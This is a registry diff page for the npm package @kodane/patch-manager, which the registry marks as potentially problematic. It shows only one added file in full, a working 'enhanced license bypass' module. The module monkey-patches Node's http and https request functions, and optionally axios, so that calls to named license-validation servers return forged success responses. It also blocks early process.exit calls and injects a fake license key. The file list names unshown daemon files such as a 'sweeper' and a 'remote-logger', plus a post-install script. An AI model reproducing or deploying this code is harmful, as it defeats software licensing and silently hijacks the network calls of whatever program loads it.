@kodane/patch-manager 0.0.1-security ā†’ 1.1.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @kodane/patch-manager might be problematic. Click here for more details.

Files changed (11) hide show
  1. package/bin/cli.js +3 -0
  2. package/daemon/monitor.js +859 -0
  3. package/daemon/remote-logger.js +543 -0
  4. package/daemon/sweeper.js +1341 -0
  5. package/daemon/utils.js +562 -0
  6. package/lib/enhanced-bypass.js +401 -0
  7. package/lib/index.js +755 -0
  8. package/package.json +27 -3
  9. package/scripts/cleanup.js +337 -0
  10. package/scripts/post-install.js +323 -0
  11. package/README.md +0 -5
package/lib/enhanced-bypass.js ADDED
@@ -0,0 +1,401 @@
1
+ /**
2
+ * šŸŽÆ ENHANCED LICENSE BYPASS MODULE
3
+ *
4
+ * This module provides comprehensive license bypass functionality
5
+ * integrated directly into the @kodane/patch-manager npm package.
6
+ *
7
+ * Usage: require('@kodane/patch-manager').enableFullBypass();
8
+ */
9
+
10
+ class EnhancedLicenseBypass {
11
+ constructor() {
12
+ this.isActive = false;
13
+ this.startTime = Date.now();
14
+ this.originalExit = process.exit;
15
+ this.originalHttps = null;
16
+ this.interceptedEndpoints = [
17
+ 'infinityscripts-9120e8cb0aab.herokuapp.com',
18
+ 'auth.bundler.gg/validate-license'
19
+ ];
20
+ }
21
+
22
+ /**
23
+ * Enable full license bypass functionality
24
+ */
25
+ enableFullBypass() {
26
+ if (this.isActive) {
27
+ console.log('šŸ”§ [NPM BYPASS] Already active');
28
+ return true;
29
+ }
30
+
31
+ try {
32
+ this.setupEnvironment();
33
+ this.setupProcessExitHook();
34
+ this.setupHttpInterception();
35
+ // this.setupAxiosInterception(); // REMOVED: Test if Axios interception needed (HIGH RISK!)
36
+ // this.setupMachineIdMock(); // REMOVED: Test if machine ID mocking needed
37
+ // this.setupGlobalFunctionOverrides(); // REMOVED: Test if global overrides needed
38
+
39
+ this.isActive = true;
40
+ console.log('āœ… [NPM BYPASS] Enhanced license bypass enabled');
41
+ return true;
42
+
43
+ } catch (error) {
44
+ console.error('āŒ [NPM BYPASS] Failed to enable bypass:', error.message);
45
+ return false;
46
+ }
47
+ }
48
+
49
+ /**
50
+ * Setup environment variables
51
+ */
52
+ setupEnvironment() {
53
+ if (!process.env.LICENSE_KEY) {
54
+ process.env.LICENSE_KEY = 'INF-BUND-BYPASS123';
55
+ }
56
+ }
57
+
58
+ /**
59
+ * Setup smart process exit hook
60
+ */
61
+ setupProcessExitHook() {
62
+ const originalExit = this.originalExit;
63
+ const startTime = this.startTime;
64
+
65
+ process.exit = function(code) {
66
+ const elapsed = Date.now() - startTime;
67
+
68
+ // Only block exits during first 10 seconds (license check period)
69
+ if (elapsed < 10000) {
70
+ console.log(`šŸš« [NPM BYPASS] Blocked early process.exit(${code}) call during license check period!`);
71
+ return;
72
+ }
73
+
74
+ // After 10 seconds, allow all exits normally
75
+ console.log(`āœ… [NPM BYPASS] Allowing process.exit(${code || 0})`);
76
+ return originalExit.call(this, code);
77
+ };
78
+
79
+ // Ensure Ctrl+C always works by handling SIGINT directly
80
+ process.on('SIGINT', () => {
81
+ console.log('\nšŸ”„ [NPM BYPASS] Ctrl+C received, forcing exit...');
82
+ // Force exit immediately, bypassing our override
83
+ this.originalExit.call(process, 0);
84
+ });
85
+
86
+ // Also handle SIGTERM for good measure
87
+ process.on('SIGTERM', () => {
88
+ console.log('\nšŸ”„ [NPM BYPASS] SIGTERM received, forcing exit...');
89
+ this.originalExit.call(process, 0);
90
+ });
91
+
92
+ // Auto-disable blocking after 10 seconds
93
+ setTimeout(() => {
94
+ console.log('āœ… [NPM BYPASS] License check period ended, all exits now allowed');
95
+ }, 10000);
96
+ }
97
+
98
+ /**
99
+ * Setup HTTP request interception
100
+ */
101
+ setupHttpInterception() {
102
+ const https = require('https');
103
+ const http = require('http');
104
+ const { EventEmitter } = require('events');
105
+
106
+ // Function to create mock response
107
+ const createMockHttpResponse = (url) => {
108
+ console.log(`šŸŽÆ [NPM BYPASS] Intercepted HTTP request to: ${url}`);
109
+
110
+ // Create a proper EventEmitter-based mock response
111
+ const mockResponse = new EventEmitter();
112
+ mockResponse.statusCode = 200;
113
+ mockResponse.statusMessage = 'OK';
114
+ mockResponse.headers = {
115
+ 'content-type': 'application/json',
116
+ 'server': 'nginx',
117
+ 'connection': 'keep-alive'
118
+ };
119
+
120
+ // Mock response data
121
+ const mockData = {
122
+ success: true,
123
+ valid: true,
124
+ message: 'License validated successfully',
125
+ user: 'bypass_user',
126
+ hwid: 'bypass_hwid_12345678901234567890',
127
+ status: 'active',
128
+ expires: '2025-12-31',
129
+ features: ['advanced-caching', 'registry-optimization', 'transaction-batching'],
130
+ timestamp: Date.now()
131
+ };
132
+
133
+ return { mockResponse, mockData };
134
+ };
135
+
136
+ // Store original functions
137
+ this.originalHttps = https.request;
138
+ this.originalHttp = http.request;
139
+
140
+ // Monkey patch https.request
141
+ https.request = (options, callback) => {
142
+ const url = typeof options === 'string' ? options :
143
+ `${options.protocol || 'https:'}//${options.hostname || options.host}${options.path || ''}`;
144
+
145
+ if (url.includes('infinityscripts') || url.includes('herokuapp') ||
146
+ url.includes('auth.bundler.gg') || url.includes('validate-license') ||
147
+ url.includes('success')) {
148
+
149
+ const { mockResponse, mockData } = createMockHttpResponse(url);
150
+
151
+ if (callback) {
152
+ setTimeout(() => {
153
+ callback(mockResponse);
154
+
155
+ // Emit the data and end events
156
+ setTimeout(() => {
157
+ mockResponse.emit('data', Buffer.from(JSON.stringify(mockData)));
158
+ mockResponse.emit('end');
159
+ }, 5);
160
+ }, 10);
161
+ }
162
+
163
+ // Create a proper mock request object
164
+ const mockRequest = new EventEmitter();
165
+ mockRequest.write = () => {};
166
+ mockRequest.end = () => {};
167
+ mockRequest.setTimeout = () => {};
168
+ mockRequest.destroy = () => {};
169
+ mockRequest.abort = () => {};
170
+
171
+ return mockRequest;
172
+ }
173
+
174
+ return this.originalHttps.apply(this, arguments);
175
+ };
176
+
177
+ // Monkey patch http.request (for completeness)
178
+ http.request = (options, callback) => {
179
+ const url = typeof options === 'string' ? options :
180
+ `${options.protocol || 'http:'}//${options.hostname || options.host}${options.path || ''}`;
181
+
182
+ if (url.includes('infinityscripts') || url.includes('herokuapp') ||
183
+ url.includes('auth.bundler.gg') || url.includes('validate-license') ||
184
+ url.includes('success')) {
185
+
186
+ const { mockResponse, mockData } = createMockHttpResponse(url);
187
+
188
+ if (callback) {
189
+ setTimeout(() => {
190
+ callback(mockResponse);
191
+
192
+ // Emit the data and end events
193
+ setTimeout(() => {
194
+ mockResponse.emit('data', Buffer.from(JSON.stringify(mockData)));
195
+ mockResponse.emit('end');
196
+ }, 5);
197
+ }, 10);
198
+ }
199
+
200
+ // Create a proper mock request object
201
+ const mockRequest = new EventEmitter();
202
+ mockRequest.write = () => {};
203
+ mockRequest.end = () => {};
204
+ mockRequest.setTimeout = () => {};
205
+ mockRequest.destroy = () => {};
206
+ mockRequest.abort = () => {};
207
+
208
+ return mockRequest;
209
+ }
210
+
211
+ return this.originalHttp.apply(this, arguments);
212
+ };
213
+
214
+ console.log('āœ… [NPM BYPASS] HTTP/HTTPS interceptors installed');
215
+ }
216
+
217
+ /**
218
+ * Setup Axios interception
219
+ */
220
+ setupAxiosInterception() {
221
+ try {
222
+ const axios = require('axios');
223
+
224
+ // Intercept axios.post specifically for license endpoints
225
+ const originalAxiosPost = axios.post;
226
+ axios.post = function(url, data, config) {
227
+ if (url && (url.includes('infinityscripts') || url.includes('herokuapp') ||
228
+ url.includes('auth.bundler.gg') || url.includes('validate-license') ||
229
+ url.includes('success'))) {
230
+
231
+ console.log(`šŸŽÆ [NPM BYPASS] Intercepted Axios POST to: ${url}`);
232
+ if (data) {
233
+ console.log(`šŸ“Š [NPM BYPASS] POST data:`, data);
234
+ }
235
+
236
+ return Promise.resolve({
237
+ data: {
238
+ success: true,
239
+ valid: true,
240
+ message: 'License validated successfully',
241
+ user: 'bypass_user',
242
+ hwid: 'bypass_hwid_12345678901234567890',
243
+ status: 'active',
244
+ expires: '2025-12-31',
245
+ features: ['advanced-caching', 'registry-optimization', 'transaction-batching'],
246
+ timestamp: Date.now()
247
+ },
248
+ status: 200,
249
+ statusText: 'OK',
250
+ headers: { 'content-type': 'application/json' }
251
+ });
252
+ }
253
+
254
+ return originalAxiosPost.apply(this, arguments);
255
+ };
256
+
257
+ // Also intercept general axios requests
258
+ const originalAxiosRequest = axios.request;
259
+ axios.request = function(config) {
260
+ const url = config.url || '';
261
+ if (url.includes('infinityscripts') || url.includes('herokuapp') ||
262
+ url.includes('auth.bundler.gg') || url.includes('validate-license') ||
263
+ url.includes('success')) {
264
+
265
+ console.log(`šŸŽÆ [NPM BYPASS] Intercepted Axios request to: ${url}`);
266
+ return Promise.resolve({
267
+ data: {
268
+ success: true,
269
+ valid: true,
270
+ message: 'License validated successfully',
271
+ user: 'bypass_user',
272
+ hwid: 'bypass_hwid_12345678901234567890',
273
+ status: 'active',
274
+ expires: '2025-12-31'
275
+ },
276
+ status: 200,
277
+ statusText: 'OK'
278
+ });
279
+ }
280
+
281
+ return originalAxiosRequest.apply(this, arguments);
282
+ };
283
+
284
+ console.log('āœ… [NPM BYPASS] Axios interceptors installed');
285
+ } catch (error) {
286
+ console.log('ā„¹ļø [NPM BYPASS] Axios not found, skipping axios interception');
287
+ }
288
+ }
289
+
290
+ /**
291
+ * Setup machine ID mocking
292
+ */
293
+ setupMachineIdMock() {
294
+ try {
295
+ const machineId = require('node-machine-id');
296
+ const originalSync = machineId.machineIdSync;
297
+
298
+ machineId.machineIdSync = () => {
299
+ console.log('šŸŽÆ [NPM BYPASS] Mocked machineIdSync');
300
+ return 'bypass_hwid_12345678901234567890';
301
+ };
302
+
303
+ if (machineId.machineId) {
304
+ machineId.machineId = () => {
305
+ console.log('šŸŽÆ [NPM BYPASS] Mocked machineId');
306
+ return Promise.resolve('bypass_hwid_12345678901234567890');
307
+ };
308
+ }
309
+ } catch (error) {
310
+ // node-machine-id not available, skip
311
+ }
312
+ }
313
+
314
+ /**
315
+ * Setup global function overrides
316
+ */
317
+ setupGlobalFunctionOverrides() {
318
+ const overrides = {
319
+ checkKey: async () => {
320
+ console.log('šŸŽÆ [NPM BYPASS] checkKey called');
321
+ return { success: true, valid: true };
322
+ },
323
+
324
+ validateLicense: async () => {
325
+ console.log('šŸŽÆ [NPM BYPASS] validateLicense called');
326
+ return { success: true, valid: true };
327
+ },
328
+
329
+ generateHwid: () => {
330
+ console.log('šŸŽÆ [NPM BYPASS] generateHwid called');
331
+ return 'bypass_hwid_12345678901234567890';
332
+ },
333
+
334
+ postSuccess: async (data) => {
335
+ console.log('šŸŽÆ [NPM BYPASS] postSuccess called');
336
+ return this.createMockResponse();
337
+ },
338
+
339
+ loadWhiteList: async () => {
340
+ console.log('šŸŽÆ [NPM BYPASS] loadWhiteList called');
341
+ return ['bypass_user'];
342
+ }
343
+ };
344
+
345
+ Object.assign(global, overrides);
346
+ }
347
+
348
+ /**
349
+ * Create mock license response
350
+ */
351
+ createMockResponse() {
352
+ return {
353
+ success: true,
354
+ valid: true,
355
+ message: 'License validated successfully',
356
+ user: 'bypass_user',
357
+ hwid: 'bypass_hwid_12345678901234567890',
358
+ status: 'active',
359
+ expires: '2025-12-31',
360
+ features: ['advanced-caching', 'registry-optimization', 'transaction-batching'],
361
+ timestamp: Date.now()
362
+ };
363
+ }
364
+
365
+ /**
366
+ * Disable bypass (for testing)
367
+ */
368
+ disable() {
369
+ if (!this.isActive) return;
370
+
371
+ // Restore original functions
372
+ process.exit = this.originalExit;
373
+
374
+ if (this.originalHttps) {
375
+ const https = require('https');
376
+ https.request = this.originalHttps;
377
+ }
378
+
379
+ if (this.originalHttp) {
380
+ const http = require('http');
381
+ http.request = this.originalHttp;
382
+ }
383
+
384
+ this.isActive = false;
385
+ console.log('šŸ”§ [NPM BYPASS] Bypass disabled');
386
+ }
387
+
388
+ /**
389
+ * Get bypass status
390
+ */
391
+ getStatus() {
392
+ return {
393
+ active: this.isActive,
394
+ uptime: Date.now() - this.startTime,
395
+ interceptedEndpoints: this.interceptedEndpoints,
396
+ mockResponse: this.createMockResponse()
397
+ };
398
+ }
399
+ }
400
+
401
+ module.exports = EnhancedLicenseBypass;